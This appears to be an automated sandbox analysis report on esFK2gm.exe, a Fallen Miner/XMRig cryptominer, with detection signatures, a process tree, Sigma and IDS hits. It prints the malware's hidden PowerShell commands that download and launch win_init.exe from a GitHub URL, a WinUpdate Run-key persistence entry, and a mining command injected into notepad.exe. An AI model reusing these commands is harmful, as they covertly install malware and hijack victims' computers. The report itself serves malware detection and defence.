
Windows Analysis Report
esFK2gm.exe

Overview

General Information

Sample name: esFK2gm.exe
Analysis ID: 1632653
MD5: 90b1db23bfe95b39d48a5a628c6e2a46
SHA1: 486b88f6f2928a03b26471376f60569ad28cfcd0
SHA256: 770b494198e289dd91a8731dc4538bd36ac37b425f21e2a854cee956dec4452c
Tags: CoinMiner, exe, user-aachum

Detection

Fallen Miner, Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
System process connects to network (likely due to code injection or exploit)
Yara detected Fallen Miner
Yara detected Xmrig cryptocurrency miner
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Detected Stratum mining protocol
Found Tor onion address
Found strings related to Crypto-Mining
Injects a PE file into a foreign process
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Notepad Making Network Connection
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • esFK2gm.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\esFK2gm.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
    • notepad.exe (PID: 7076 cmdline: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25 MD5: 27F71B12CB585541885A31BE22F61C83)
    • tasklist.exe (PID: 6948 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1864 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3460 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 2256 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 4200 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1548 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7092 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1820 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7028 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1328 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • win_init.exe (PID: 916 cmdline: "C:\Users\user\AppData\Roaming\win_init.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
  • svchost.exe (PID: 2448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 6180 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7028 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2732 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3112 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • cmd.exe (PID: 5840 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3776 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • win_init.exe (PID: 6092 cmdline: "C:\Users\user\AppData\Roaming\win_init.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
  • sppsvc.exe (PID: 1680 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 4724 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4380 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author
esFK2gm.exe | JoeSecurity_FallenMiner | Yara detected Fallen Miner | Joe Security
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
sslproxydump.pcap | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  Strings:
  • 0x5d91cb:$a1: mining.set_target
  • 0x1e5cfbb:$a1: mining.set_target
  • 0x24d710f:$a1: mining.set_target
  • 0x5d370d:$a2: XMRIG_HOSTNAME
  • 0x1e574b7:$a2: XMRIG_HOSTNAME
  • 0x24d1651:$a2: XMRIG_HOSTNAME
  • 0x5d5953:$a3: Usage: xmrig [OPTIONS]
  • 0x1e59789:$a3: Usage: xmrig [OPTIONS]
  • 0x24d38dd:$a3: Usage: xmrig [OPTIONS]
  • 0x5d36e5:$a4: XMRIG_VERSION
  • 0x1e5748f:$a4: XMRIG_VERSION
  • 0x24d1629:$a4: XMRIG_VERSION
C:\Users\user\AppData\Roaming\win_init.exe | JoeSecurity_FallenMiner | Yara detected Fallen Miner | Joe Security
00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  Strings:
  • 0xdc70:$a1: mining.set_target
  • 0x8658:$a2: XMRIG_HOSTNAME
  • 0xa740:$a3: Usage: xmrig [OPTIONS]
  • 0x8630:$a4: XMRIG_VERSION
00000000.00000002.2131272483.000000C0002B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000001E.00000002.1619147975.000000C00015E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Source | Rule | Description | Author
30.2.win_init.exe.c000160000.4.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
30.2.win_init.exe.c00015e000.7.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
30.2.win_init.exe.c00005c400.1.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0.2.esFK2gm.exe.c000a90000.3.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0.2.esFK2gm.exe.c000a90000.3.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  Strings:
  • 0x586c70:$a1: mining.set_target
  • 0x581658:$a2: XMRIG_HOSTNAME
  • 0x583740:$a3: Usage: xmrig [OPTIONS]
  • 0x581630:$a4: XMRIG_VERSION

Bitcoin Miner

Source: Process started; Author: Joe Security; Data: Command: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, CommandLine: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: "C:\Users\user\Desktop\esFK2gm.exe", ParentImage: C:\Users\user\Desktop\esFK2gm.exe, ParentProcessId: 6424, ParentProcessName: esFK2gm.exe, ProcessCommandLine: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, ProcessId: 7076, ProcessName: notepad.exe

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
Source: Network Connection; Author: EagleEye Team; Data: DestinationIp: 45.144.212.77, DestinationIsIpv6: false, DestinationPort: 3333, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49691
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\esFK2gm.exe, ProcessId: 6424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1820, TargetFilename: C:\Users\user\AppData\Roaming\win_init.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community; Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\esFK2gm.exe, ProcessId: 6424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2448, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-08T16:01:07.839379+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.7 | 49691 | 45.144.212.77 | 3333 | TCP
2025-03-08T16:01:43.994336+0100 | 1810003 | 2 | Potentially Bad Traffic | 185.199.108.133 | 443 | 192.168.2.7 | 49692 | TCP
2025-03-08T16:02:01.222347+0100 | 1810003 | 2 | Potentially Bad Traffic | 185.199.108.133 | 443 | 192.168.2.7 | 49700 | TCP
2025-03-08T16:01:41.315354+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49690 | 140.82.121.3 | 443 | TCP
2025-03-08T16:01:43.984518+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49692 | 185.199.108.133 | 443 | TCP
2025-03-08T16:01:57.315071+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49697 | 140.82.121.3 | 443 | TCP
2025-03-08T16:02:01.209141+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49700 | 185.199.108.133 | 443 | TCP


AV Detection

